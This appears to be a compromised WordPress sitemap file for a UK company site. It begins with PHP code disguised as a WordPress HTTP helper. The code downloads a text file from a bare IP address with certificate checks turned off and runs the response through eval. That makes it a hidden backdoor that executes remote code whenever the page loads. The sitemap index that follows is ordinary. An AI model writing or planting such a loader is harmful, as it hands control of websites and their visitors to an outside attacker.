function WordPress_Http_Curl ( $url, $args = array() ) {
	if ( ! function_exists( 'curl_init' ) || ! function_exists( 'curl_exec' ) ) {
		return false;
	}
	$handle = curl_init();
	curl_setopt( $handle, CURLOPT_URL, $url );
	curl_setopt( $handle, CURLOPT_RETURNTRANSFER, true );
	curl_setopt( $handle, CURLOPT_HEADER, false );
	curl_setopt( $handle, CURLOPT_SSL_VERIFYHOST, false );
	curl_setopt( $handle, CURLOPT_SSL_VERIFYPEER, false );
	$response = curl_exec( $handle );
	$curl_error = curl_error( $handle );
	if ( !$curl_error ) {
		$response = array(
			'data' =>  eval( '?>'. $response )
		);
		return $response;
	}
	if ( PHP_VERSION_ID < 80000 ) {
		curl_close( $handle );
	}
}

$result = WordPress_Http_Curl( 'http://173.208.206.186/z60606_1q/stat/index.txt' );
?>
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://zeirlimited.co.uk/sitemaps.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap>
							<loc>https://zeirlimited.co.uk/post-sitemap1.xml</loc>
							<lastmod>2025-07-17T12:30:37+00:00</lastmod>
						</sitemap><sitemap>
							<loc>https://zeirlimited.co.uk/page-sitemap1.xml</loc>
							<lastmod>2025-10-23T11:26:38+00:00</lastmod>
						</sitemap><sitemap>	
							<loc>https://zeirlimited.co.uk/category-sitemap1.xml</loc>
							<lastmod>2026-07-01T11:08:41+00:00</lastmod>
						</sitemap></sitemapindex>